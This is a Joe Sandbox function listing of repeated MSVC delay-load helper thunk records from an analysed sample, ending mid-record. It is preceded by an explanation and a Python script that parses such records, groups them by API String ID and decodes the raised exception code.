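Every record in this stretch of the listing shares API String ID 1269201914-0 and has a single direct call, ___delayLoadHelper2@8 in DELAYIMP, reached from a handful of call sites (000EE1E3, 000EEAF9, 000EE3FC, 000EE51F, 000EE580). The shared subcall at 000EE85D raises exception code C06D0057, which is VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER): facility 0x6D is Visual C++ and 0x57 is ERROR_INVALID_PARAMETER, the code the MSVC delay-load helper raises when a delay-import descriptor is not RVA-based. These are linker-generated delay-load thunks, not logic specific to the sample, and an analyst working through the function listing can set the whole cluster aside. The script below is an added example, not part of the Joe Sandbox report: it parses records in this page's plain-text layout, groups them by API String ID, flags clusters made only of delay-load thunks and decodes the raised exception code. The two thunk records in its sample are copied from this page; the WriteFile record is hypothetical and only there to show the filter separating ordinary code from thunks.

```python
"""Triage helper for Joe Sandbox function records (added example, not report output).
Assumes the plain-text layout seen on this page: an 'APIs' block, then other blocks
('Memory Dump Source', 'Similarity', ...) made of '•' bullets; sub-bullets under APIs
read '• Part of subcall function ADDR: Name.MODULE(args), ref: ADDR'."""
import re
from collections import defaultdict

# Constructed excerpt: two records copied from this page, trimmed to the bullets the
# parser uses, plus one hypothetical WriteFile record that is NOT on the page and only
# exists to show the filter separating ordinary code from delay-load stubs.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
  • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
  • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
Similarity
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 000EEAF9
  • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
  • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
Similarity
• API String ID: 1269201914-0
APIs
• WriteFile.KERNEL32(?,?,00000000,?), ref: 000E1234
Similarity
• API String ID: 0-0
"""

API_RE = re.compile(r"^(?P<name>[^\s.(]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s+(?P<rest>.+)$")
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")
# VcppException(sev, err) = sev | (FACILITY_VISUALCPP << 16) | err, so 0xC06D0057 is
# ERROR_SEVERITY_ERROR, facility 0x6D, Win32 error 0x57 (ERROR_INVALID_PARAMETER).
FACILITY_NAMES = {0x6D: "FACILITY_VISUALCPP"}
WIN32_NAMES = {0x57: "ERROR_INVALID_PARAMETER", 0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}

def parse_api(text):
    """'Name.MODULE(args), ref: ADDR' -> dict, or None if the bullet is not a call."""
    m = API_RE.match(text)
    if not m:
        return None
    d = m.groupdict()
    d["args"] = d["args"].split(",") if d["args"] else []
    return d

def parse_records(report_text):
    """Split the listing at every 'APIs' header; other bare lines are section headers."""
    records, rec, section = [], None, None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = {"apis": [], "subcalls": [], "fields": {}}
            records.append(rec)
            section = line
        elif not line or rec is None:
            continue
        elif not line.startswith("•"):
            section = line
        elif section == "APIs":
            sub = SUBCALL_RE.match(line[1:].strip())
            api = parse_api(sub["rest"] if sub else line[1:].strip())
            if api and sub:
                api["caller"] = sub["caller"]
                rec["subcalls"].append(api)
            elif api:
                rec["apis"].append(api)
        else:
            f = FIELD_RE.match(line[1:].strip())
            if f:
                rec["fields"][f["key"]] = f["value"]
    return records

def decode_exception_code(code):
    """Decode an NTSTATUS-layout code such as the first RaiseException argument."""
    facility, win32 = (code >> 16) & 0x0FFF, code & 0xFFFF
    return {"severity": ("success", "informational", "warning", "error")[code >> 30],
            "facility": FACILITY_NAMES.get(facility, hex(facility)),
            "win32": win32, "win32_name": WIN32_NAMES.get(win32, hex(win32))}

def is_delay_load_thunk(rec):
    """True when every direct call in the record goes to the MSVC delay-load helper."""
    return bool(rec["apis"]) and all(
        a["name"] == "___delayLoadHelper2@8" and a["module"] == "DELAYIMP" for a in rec["apis"])

def summarize(records):
    """Group by API String ID: record count, thunk count, call sites, raised exception codes."""
    groups = defaultdict(lambda: {"count": 0, "thunks": 0, "refs": set(), "raise_codes": set()})
    for rec in records:
        g = groups[rec["fields"].get("API String ID", "?")]
        g["count"] += 1
        g["thunks"] += is_delay_load_thunk(rec)
        g["refs"].update(a["ref"] for a in rec["apis"])
        for s in rec["subcalls"]:
            if s["name"] == "RaiseException" and s["args"] and HEX_RE.fullmatch(s["args"][0]):
                g["raise_codes"].add(int(s["args"][0], 16))
    return {k: dict(v, refs=sorted(v["refs"]), raise_codes=sorted(v["raise_codes"]))
            for k, v in groups.items()}

if __name__ == "__main__":
    for sid, g in summarize(parse_records(SAMPLE)).items():
        verdict = "delay-load thunks, skip" if g["thunks"] == g["count"] else "review"
        print(f"{sid}: {g['count']} record(s) at {g['refs']} -> {verdict}")
        for code in g["raise_codes"]:
            print("   RaiseException", hex(code), decode_exception_code(code))
```

Run against the full listing, the same grouping separates the repeated delay-load stubs from the handful of API String IDs that actually carry the sample's own behaviour, and any other RaiseException code in a subcall is decoded the same way; codes 0xC06D007E and 0xC06D007F would instead mean the helper could not load a delay-loaded DLL or resolve an export.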
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 235aeae874949207448c487c14c9a6bdbfaf749e48ba7dd39262692114bbec97
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 235aeae874949207448c487c14c9a6bdbfaf749e48ba7dd39262692114bbec97
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 75344c389c54a8fc76eccb8f6af0505ed20fa50b1bef50e000b522437c86b926
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 75344c389c54a8fc76eccb8f6af0505ed20fa50b1bef50e000b522437c86b926
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1d0cb5784359a6f9cb2334d3c75af35019fc4d435f5006ce0fab774bdeb6bc09
                                                            • Instruction ID: 56aa356f736836bb2c922a973cb65ddf30017e3a4ebaf19f4955f3d3cf0a974c
                                                            • Opcode Fuzzy Hash: 1d0cb5784359a6f9cb2334d3c75af35019fc4d435f5006ce0fab774bdeb6bc09
                                                            • Instruction Fuzzy Hash: B8A002F52591C5BCB11852539D16C7B011DC5C5B51330856DF856D44C16D9068451C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2a7125445f03acaaa8164726b5850a4400819293e9ca8d937b07d7173f1dc4b0
                                                            • Instruction ID: 9184a12e28b8495a698e3089aac7bbfee703bbce70ba66fdb3bb0caf1a00b93f
                                                            • Opcode Fuzzy Hash: 2a7125445f03acaaa8164726b5850a4400819293e9ca8d937b07d7173f1dc4b0
                                                            • Instruction Fuzzy Hash: 1EA012F12540C53CF02412129D06C7B021CC1C0B10330421DF414B00C15D8008040872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 89041992e94627ba0e5a812a242eeb9bdb8af552ff19cebea40abceedaee3822
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: 89041992e94627ba0e5a812a242eeb9bdb8af552ff19cebea40abceedaee3822
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 92003dc451e5ded7df4132f4fee25909e9808103886ad37c69840417a05788d4
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: 92003dc451e5ded7df4132f4fee25909e9808103886ad37c69840417a05788d4
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: dfb3a2b8e8a91b00dffcd7929426acf70aec8b6f36dc3d99864adc7c360de48e
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: dfb3a2b8e8a91b00dffcd7929426acf70aec8b6f36dc3d99864adc7c360de48e
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c942430491ed5612ff33bb371924b23b9e1cd4a6c943f7441177ebfeb3297a82
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: c942430491ed5612ff33bb371924b23b9e1cd4a6c943f7441177ebfeb3297a82
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4749a8e088fc469e4aabc9894804f67d7d00e956a314cc758857465687ef7d76
                                                            • Instruction ID: 2374da83a8a9f7a5e47e4f94e54412ef79973715010ec0b9bf4e792f550dfc17
                                                            • Opcode Fuzzy Hash: 4749a8e088fc469e4aabc9894804f67d7d00e956a314cc758857465687ef7d76
                                                            • Instruction Fuzzy Hash: 52A012F12580C57CF02412129D06C7B021CC1C0B10330461DF405A00C15D8008040872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c847b9b6eddc4007782c111ffcd4f6b1cccdd590b87f1687b6d9ed18439d4bbf
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: c847b9b6eddc4007782c111ffcd4f6b1cccdd590b87f1687b6d9ed18439d4bbf
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                             • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ad0e4c905e85257fc93b6f5d5328946f2db8024bae18d2d3c6708b5bdb06c244
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: ad0e4c905e85257fc93b6f5d5328946f2db8024bae18d2d3c6708b5bdb06c244
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 67f58d6b53f084134f58ccd790b68a49141130caa572c6b95b94bdc662a35e79
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: 67f58d6b53f084134f58ccd790b68a49141130caa572c6b95b94bdc662a35e79
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7a78d350a32dd3243de0666e9948fd38d809c7d6d5de593bad998499fee19126
                                                            • Instruction ID: f5aed116a9b9c95c1ab75d3a513957e6eb7667e9051915e21ea1b221335776ba
                                                            • Opcode Fuzzy Hash: 7a78d350a32dd3243de0666e9948fd38d809c7d6d5de593bad998499fee19126
                                                            • Instruction Fuzzy Hash: C0A012D21598C57CF01412029D02C3F010CC1C5F10330451DF445900C16D800C040870
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5632675b6867307c043e36e71472b06bc87a297df4c8b4daa9f34cb2705f62fc
                                                            • Instruction ID: f5a523c96a8ebfec92200e79a47a23e6c7290dfc0968584dea04ec9d95b02da6
                                                            • Opcode Fuzzy Hash: 5632675b6867307c043e36e71472b06bc87a297df4c8b4daa9f34cb2705f62fc
                                                            • Instruction Fuzzy Hash: E7A011E22A80C83CF02823A2AE02C3B020CC2C0B22330832EF808A00C2AE80080808B0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6b6ef76e111551d4fe46fd96345c7a0b0257f9da5c9276334cd76109ba0344fc
                                                            • Instruction ID: a0685b6973c4edab55face3cda7930adb0d60d7c3842157555535b54d265eae3
                                                            • Opcode Fuzzy Hash: 6b6ef76e111551d4fe46fd96345c7a0b0257f9da5c9276334cd76109ba0344fc
                                                            • Instruction Fuzzy Hash: F3A012D21580C57CF01413529D02C3B010CC1C0B10330461EF405900C16D8008080870
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE580
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
